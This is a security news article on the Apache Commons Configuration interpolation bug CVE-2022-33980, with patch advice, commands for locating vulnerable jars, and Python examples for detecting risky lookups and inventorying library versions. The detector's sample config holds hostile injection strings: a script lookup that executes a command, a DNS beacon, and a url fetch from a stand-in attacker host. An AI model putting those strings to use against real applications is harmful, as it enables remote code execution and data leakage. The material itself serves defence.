Apache “Commons Configuration” patches Log4Shell-style bug – what you should know – Naked Security


Remember the Log4Shell bug (CVE-2021-44228) that showed up in Apache Log4j late in 2021?
Log4j is one of the Apache Software Foundation's many software projects (more than 350 at the current count), and it's a programming library that Java coders can use to manage logfiles in their own products.
Logfiles are a vital part of development, debugging, record keeping, program monitoring, and, in many industry sectors, of regulatory compliance.
Unfortunately, not all the text you logged – even if it was sent in by an external user, for example as a username in a login form – was treated literally.
If you gave your name as MYNAME, it would be logged just like that, as the text string MYNAME, but any text wrapped in ${…} characters was treated as a command for the logger to run (most notoriously a ${jndi:…} lookup that could fetch and load code from a remote server), which could cause what's known as RCE, short for remote code execution.

Recently, we saw a similar sort of bug called Follina (CVE-2022-30190), which affected Microsoft Windows.
There, the troublesome characters were $(…), with round brackets replacing squiggly ones, but with the same sort of side-effect.
In the Follina bug, a URL that contained a directory name with the string SOMETEXT in it would be treated just as it was written, but any text wrapped in $(…) would be run as a PowerShell command, once again creating a risk of remote code execution.

More trouble with brackets
Well, the bug CVE-2022-33980, which doesn't have a catchy name yet, is a very similar sort of blunder in the Apache Commons Configuration toolkit.
The name's quite a mouthful: Apache Commons is another Apache project that hosts numerous Java utilities (sub-projects, if you like) that provide a wide range of useful programming toolkits.
One of these is Commons Configuration, which lets Java apps work with configuration files in a wide range of different formats, including XML, INI, plist, and many more.
As the project itself says, “the Commons Configuration software library provides a generic configuration interface which enables a Java application to read configuration data from a variety of sources.”
Unfortunately, this software treats text wrapped in ${…} specially, too.
Instead of using the text literally, the following special “reprocessing” takes place, referred to rather confusingly in the jargon as interpolation. The general form is ${prefix:name}, where the prefix selects a lookup that decides how name gets resolved, and in the affected versions three of the lookups that were switched on by default were:

${script:STRING} runs STRING as a script via the JVM's scripting engine (javax.script, so for example ${script:javascript:…}) and uses the output of that code in place of the variable.
${dns:STRING} looks up STRING using DNS.
${url:STRING} reads the URL STRING and retrieves the text to use from there.

In other words, booby-trapped configuration files could, in theory, be used to run malicious code, leak data via DNS lookups, or fetch configuration settings from a rogue website. Note that, as the project's advisory puts it, the risk exists wherever untrusted configuration values are used: you don't have to let outsiders supply a whole config file, because a single attacker-controlled value that later gets interpolated is enough.
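To make the ${prefix:name} mechanism concrete, here is an added example written for this page in Python; it is not code from Apache Commons Configuration, which is a Java library, but an emulation of the variable syntax that library uses. It finds every interpolation variable in a chunk of properties-file text, flags the three prefixes the advisory names, and shows an allow-list interpolator that resolves only the lookups you chose and leaves everything else literal, which is the behaviour the fixed version adopts by default. The sample properties, the const lookup and the hostnames are constructed for the illustration, and the dns and url variable bodies only approximate the real lookup syntax.

```python
"""Spot and neutralise Commons Configuration-style ${prefix:name} lookups.

Added example in Python; NOT code from Apache Commons Configuration (a Java
library). It emulates the variable syntax the library uses so the idea can
be shown without a JVM.
"""
import re

# Variable syntax: ${prefix:name}. The name may itself contain ':'
# (e.g. script:javascript:1+1), so the prefix is everything before the
# FIRST colon; a variable with no colon has no prefix at all.
VAR_RE = re.compile(r"\$\{([^}]*)\}")

# The three lookups that 2.4-2.7 enabled by default and 2.8.0 turned off,
# per the CVE-2022-33980 advisory.
DANGEROUS_PREFIXES = {"script", "dns", "url"}


def find_variables(text):
    """Return (prefix, name) for every ${...} in text; prefix '' if none."""
    found = []
    for body in VAR_RE.findall(text):
        prefix, sep, name = body.partition(":")
        found.append((prefix, name) if sep else ("", body))
    return found


def flag_dangerous(text):
    """The (prefix, name) pairs that would run code or touch the network."""
    return [(p, n) for p, n in find_variables(text) if p in DANGEROUS_PREFIXES]


def interpolate(text, lookups):
    """Expand variables using ONLY the lookups in the allow-list.

    Anything with an unknown prefix (script/dns/url included) is left in the
    output exactly as written rather than being resolved."""
    def expand(match):
        body = match.group(1)
        prefix, sep, name = body.partition(":")
        fn = lookups.get(prefix) if sep else None
        value = fn(name) if fn else None
        return match.group(0) if value is None else str(value)
    return VAR_RE.sub(expand, text)


# Constructed sample, e.g. a properties file uploaded by a tenant. Hostnames
# and values are made up; the dns/url bodies only approximate the real syntax.
SAMPLE_PROPERTIES = """\
app.name = inventory
db.host  = db.${const:env}.internal
db.pass  = ${script:javascript:java.lang.Runtime.getRuntime().exec('id')}
beacon   = ${dns:address|leak.example.invalid}
remote   = ${url:UTF-8:http://attacker.example.invalid/app.properties}
"""

# Allow-list for this example: one lookup, backed by an in-memory table.
CONSTANTS = {"env": "prod"}
SAFE_LOOKUPS = {"const": CONSTANTS.get}

if __name__ == "__main__":
    for prefix, name in flag_dangerous(SAMPLE_PROPERTIES):
        print("DANGEROUS lookup:", prefix, "->", name)
    print(interpolate(SAMPLE_PROPERTIES, SAFE_LOOKUPS))
```

The allow-list is the point: the interpolator never consults a prefix it wasn't handed, so a hostile value such as the db.pass line survives as inert text. Running flag_dangerous over configuration you receive from outside is a cheap pre-check, but it is not a substitute for upgrading, since the library's own interpolator is what actually does the expansion.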
What to do?
According to the Commons Configuration team, this “interpolation” bug was introduced in version 2.4 (released in late 2018) and patched in version 2.8.0 (released 2022-07-05, which is Tuesday this week). Note that the fix doesn't remove the script, dns and url lookups from the library; it stops them being enabled by default, so code that deliberately re-enables them remains exposed to hostile input.
All updates going back to version 2.2 in 2017 are listed as “minor releases”, so we're assuming that updating from any of the vulnerable versions 2.4, 2.5, 2.6 or 2.7 to the latest version should be uncontroversial.
So, if you have any Java software that uses the Apache Commons Configuration library, update as soon as you can!
Oh, and if you're a programmer…
…whether you call it “command substitution”, “live rewriting”, “reprocessing” or “interpolation”, use it sparingly, and don't turn it on by default for data you haven't already verified that you can trust.
Am I vulnerable?
A quick way to search for a possibly-vulnerable Commons Configuration library on a computer is to look for filenames of the form commons-configuration2-*.jar, where * is a wildcard denoting “any text allowed here”. Bear in mind that a filename search won't spot the library if it has been shaded into a fat jar or bundled inside a WAR or EAR file, so treat a clean result as a starting point rather than a guarantee.
On Linux/Unix, try:

$ find / -type f -name 'commons-configuration2-*.jar'

On Windows, try:

> DIR C:\commons-configuration2-*.jar /S

Vulnerable versions have the names:

commons-configuration2-2.4.jar
commons-configuration2-2.5.jar
commons-configuration2-2.6.jar
commons-configuration2-2.7.jar

Earlier or later versions don't have the bug.
The latest, patched version is:

commons-configuration2-2.8.0.jar

If you find files with names like this:

commons-configuration-1.9.jar

…these are the old (version 1) flavour of the library, which doesn't have this bug.
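The filename search above is only a first pass, so here is an added example, written for this page in Python and not a tool from Apache or from the original article, that does the same inventory job more thoroughly. It walks a directory tree, parses the version out of any commons-configuration2-*.jar name and classifies it against the 2.4 to 2.7 range, and also opens .jar/.war/.ear archives to find the library nested inside them (for example under WEB-INF/lib) or shaded into a fat jar, where only the Maven META-INF/maven/org.apache.commons/commons-configuration2/pom.properties descriptor gives the version away. The tree it scans is constructed in a temporary folder with made-up file names; point scan() at a real root such as / or C:\ to use it in earnest.

```python
"""Inventory scan for Apache Commons Configuration jars (CVE-2022-33980).

Added illustration in Python; not code from the article or from Apache. It
goes beyond a filename search in two ways: it parses the version out of the
name and classifies it against the advisory's 2.4..2.7 range, and it looks
INSIDE .jar/.war/.ear archives for a nested commons-configuration2-*.jar or
for the Maven pom.properties that a shaded (repackaged) build still carries.
"""
import io
import os
import re
import tempfile
import zipfile
from pathlib import Path

NAME_RE = re.compile(r"^commons-configuration2-(\d+(?:\.\d+)*)\.jar$")
# Maven-built Commons jars ship this descriptor; its version= line survives
# when the classes are shaded into a fat jar.
POM_PROPS = "META-INF/maven/org.apache.commons/commons-configuration2/pom.properties"
ARCHIVE_SUFFIXES = {".jar", ".war", ".ear", ".zip"}


def parse_version(text):
    """'2.7' -> (2, 7); '2.8.0' -> (2, 8, 0)."""
    return tuple(int(p) for p in text.split("."))


def classify(version):
    """Vulnerable range per the advisory: 2.4 <= version < 2.8.0."""
    v = (version + (0, 0, 0))[:3]
    return "VULNERABLE" if (2, 4, 0) <= v < (2, 8, 0) else "ok"


def version_from_filename(name):
    """Version encoded in a commons-configuration2-X.Y.jar name, or None."""
    m = NAME_RE.match(Path(name).name)
    return parse_version(m.group(1)) if m else None


def _version_in_zip(zf, depth):
    names = zf.namelist()
    if POM_PROPS in names:  # shaded build: version only in the descriptor
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return parse_version(line.split("=", 1)[1].strip())
    for inner in names:  # nested jar, e.g. WEB-INF/lib/ inside a WAR
        if not inner.endswith(".jar"):
            continue
        v = version_from_filename(inner)
        if v is None and depth > 0:
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(inner))) as izf:
                    v = _version_in_zip(izf, depth - 1)
            except zipfile.BadZipFile:
                v = None
        if v is not None:
            return v
    return None


def version_from_archive(path, depth=1):
    """Version of commons-configuration2 bundled inside an archive, or None."""
    try:
        with zipfile.ZipFile(path) as zf:
            return _version_in_zip(zf, depth)
    except (zipfile.BadZipFile, OSError):
        return None


def scan(root):
    """Walk root and return (path, version string, status) for every hit."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if Path(name).suffix.lower() not in ARCHIVE_SUFFIXES:
                continue
            path = os.path.join(dirpath, name)
            v = version_from_filename(name) or version_from_archive(path)
            if v is not None:
                hits.append((path, ".".join(map(str, v)), classify(v)))
    return hits


def build_sample_tree(root):
    """Construct a made-up directory tree (hypothetical names, not a real host)."""
    lib = Path(root) / "lib"
    lib.mkdir(parents=True, exist_ok=True)
    (lib / "commons-configuration2-2.7.jar").write_bytes(b"")    # vulnerable
    (lib / "commons-configuration2-2.8.0.jar").write_bytes(b"")  # patched
    (lib / "commons-configuration-1.9.jar").write_bytes(b"")     # v1 line, unaffected
    with zipfile.ZipFile(Path(root) / "app-all.jar", "w") as zf:  # shaded fat jar
        zf.writestr(POM_PROPS, "version=2.5\nartifactId=commons-configuration2\n")
    with zipfile.ZipFile(Path(root) / "shop.war", "w") as zf:     # nested in WEB-INF/lib
        zf.writestr("WEB-INF/lib/commons-configuration2-2.6.jar", b"")
    return root


def demo():
    """Scan the constructed tree; return sorted (file name, version, status)."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return sorted((Path(p).name, v, s) for p, v, s in scan(tmp))


if __name__ == "__main__":
    for name, version, status in demo():
        print(f"{status:10} {version:6} {name}")
```

Treat “ok” as “not in the vulnerable range of the 2.x line”, not as a clean bill of health: a jar whose META-INF has been stripped, or one renamed by a build tool, still won't be recognised, and the version 1 commons-configuration-*.jar files are deliberately skipped because they don't carry this bug.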

Note. The name Apache refers to the entire Software Foundation and all its projects. It's not the name of a webserver, in the same way that Microsoft isn't the name of an operating system. So, even though websites based on the Apache Web Server, also known as httpd, are often described as “running Apache”, this bug doesn't apply to the web server, which is written in C, not in Java.
